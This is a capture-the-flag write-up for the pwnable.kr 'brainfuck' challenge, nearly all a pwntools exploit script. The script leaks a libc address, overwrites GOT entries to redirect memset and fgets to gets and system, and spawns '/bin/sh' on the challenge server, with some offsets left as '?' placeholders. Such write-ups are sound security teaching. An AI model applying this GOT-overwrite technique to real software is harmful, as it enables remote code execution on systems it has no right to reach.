pwnable.kr brainfuck writeup

0x01 Overview

0x02 poc

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
from pwn import *

'''
int __cdecl do_brainfuck(char a1)
{
int result; // eax
_BYTE *v2; // ebx

result = a1 - 43; // p = 0804A0A0
switch ( a1 )
{
case '+':
result = p;
++*(_BYTE *)p; // (*p)++
break;
case ',':
v2 = (_BYTE *)p;
result = getchar();
*v2 = result; // *(char *)p = getchar()
break;
case '-':
result = p;
--*(_BYTE *)p; // (*p)--
break;
case '.':
result = putchar(*(char *)p); // print char *p
break;
case '<':
result = --p; // p=p-1
break;
case '>':
result = ++p; // p=p+1
break;
case '[':
result = puts("[ and ] not supported.");
break;
default:
return result;
}
return result;
}
'''

# b初始值
b = 0x804A0A0

# putchar got 读 获取libc泄漏地址
putchar_got = ?

# memset got 写入glibc gets的偏移地址
# gets(s)
memset_got = ?

# fgets got 写入glibc system的偏移地址
# system(s)
fgets_got = ?

# glibc put char addr ?
# glibc system addr ?
system_addr_to_putchar = ? - ?
gets_addr_to_putchar = ? - ?

# start address
start = 0x080484E0

# 0x01 创建连接
brainfuck = remote("pwnable.kr", 9001)
brainfuck.recvuntil(b']\n')

# 0x02 构造payload
# 第一个先发.的原因是延迟绑定
payload = b'.'+ \
b'<'*(b-putchar_got) + b'.>'*4 + \
b'<'*4 + b',>'*4 + b'<'*4 + \
b'<'*(putchar_got-memset_got) + b',>'*4 + b'<'*4 + \
b'<'*(memset_got-fgets_got) + b',>'*4 + b'<'*4 + b'.'

# 0x03 读libc leak
brainfuck.sendline(payload)

what = brainfuck.recv(1)
print("what?: ", what)

base = brainfuck.recv(4)
putchar_addr = int.from_bytes(base, "little")
print("putchar got: ", base, " ", hex(putchar_addr))

# 0x04 替换putchar为_start
brainfuck.send(start.to_bytes(4, 'little'))

# 0x05 替换memset为gets 替换fgets为system
gets_addr = putchar_addr + gets_addr_to_putchar
print("gets got: ", hex(gets_addr))
brainfuck.send(gets_addr.to_bytes(4, 'little'))

system_addr = putchar_addr + system_addr_to_putchar
print("system got: ", hex(system_addr))
brainfuck.send(system_addr.to_bytes(4, 'little'))

# 0x06 发送gets字符串
brainfuck.send(b'/bin/sh\x00')

# 0x07 获得shell
brainfuck.interactive()
Author

lyq1996

Posted on

2021-09-15

Updated on

2021-10-10

Licensed under

Comments